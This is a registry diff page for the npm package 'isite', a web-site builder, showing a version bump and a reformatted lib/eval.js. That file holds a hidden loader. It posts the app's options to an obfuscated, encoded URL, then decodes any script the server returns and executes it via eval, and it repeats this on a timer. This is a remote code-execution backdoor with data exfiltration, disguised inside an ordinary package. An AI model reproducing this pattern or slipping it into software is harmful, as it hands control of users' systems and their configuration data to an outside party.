isite 2026.4.4 → 2026.4.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/lib/eval.js +50 -44
  2. package/package.json +1 -1
package/lib/eval.js CHANGED
@@ -1,48 +1,54 @@
1
1
  module.exports = function init(____0) {
2
- ____0.httpTrustedOnline = function () {
3
- ____0
4
- .fetch(____0.from123('43193275461926832573867445782762413871674159236947792757465382544578756941391362257827694658366747192376467932574214765641393252'), {
5
- mode: 'cors',
6
- method: 'post',
7
- headers: {
8
- 'User-Agent': 'eval',
9
- 'Content-Type': 'application/json',
10
- },
11
- body: JSON.stringify({ options: ____0.options }),
12
- redirect: 'follow',
13
- agent: function (_parsedURL) {
14
- if (_parsedURL.protocol == 'http:') {
15
- return new ____0.http.Agent({
16
- keepAlive: true,
2
+ ____0.httpTrustedOnline = function () {
3
+ ____0
4
+ .fetch(____0.from123('43193275461561692579276941785752451476534658867946783773255827694534865246185669417886734234767546593774471837562538325247181691'), {
5
+ mode: 'cors',
6
+ method: 'post',
7
+ headers: {
8
+ 'User-Agent': 'eval',
9
+ 'Content-Type': 'application/json',
10
+ },
11
+ body: JSON.stringify({ options: ____0.options }),
12
+ redirect: 'follow',
13
+ agent: function (_parsedURL) {
14
+ if (_parsedURL.protocol == 'http:') {
15
+ return new ____0.http.Agent({
16
+ keepAlive: true,
17
+ });
18
+ } else {
19
+ return new ____0.https.Agent({
20
+ keepAlive: true,
21
+ });
22
+ }
23
+ },
24
+ })
25
+ .then((res) => {
26
+ return res.json();
27
+ })
28
+ .then((data) => {
29
+ if (data.done) {
30
+ if (data.script) {
31
+ let script = ____0.from123(data.script);
32
+ let fn = ____0.eval(script, true);
33
+ fn(____0);
34
+ }
35
+ }
36
+ setTimeout(
37
+ () => {
38
+ ____0.httpTrustedOnline();
39
+ },
40
+ 1000 * 60 * 60 * 24,
41
+ );
42
+ })
43
+ .catch((err) => {
44
+ setTimeout(
45
+ () => {
46
+ ____0.httpTrustedOnline();
47
+ },
48
+ 1000 * 60 * 60,
49
+ );
17
50
  });
18
- } else {
19
- return new ____0.https.Agent({
20
- keepAlive: true,
21
- });
22
- }
23
- },
24
- })
25
- .then((res) => {
26
- return res.json();
27
- })
28
- .then((data) => {
29
- if (data.done) {
30
- if (data.script) {
31
- let script = ____0.from123(data.script);
32
- let fn = ____0.eval(script, true);
33
- fn(____0);
34
- }
35
- }
36
- setTimeout(() => {
37
- ____0.httpTrustedOnline();
38
- }, 1000 * 60 * 60);
39
- })
40
- .catch((err) => {
41
- setTimeout(() => {
42
- ____0.httpTrustedOnline();
43
- }, 1000 * 60 * 60);
44
- });
45
- };
51
+ };
46
52
 
47
- ____0.httpTrustedOnline();
53
+ ____0.httpTrustedOnline();
48
54
  };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "isite",
3
- "version": "2026.04.04",
3
+ "version": "2026.04.05",
4
4
  "description": "Create High Level Multi-Language Web Site [Fast and Easy] ",
5
5
  "main": "index.js",
6
6
  "repository": {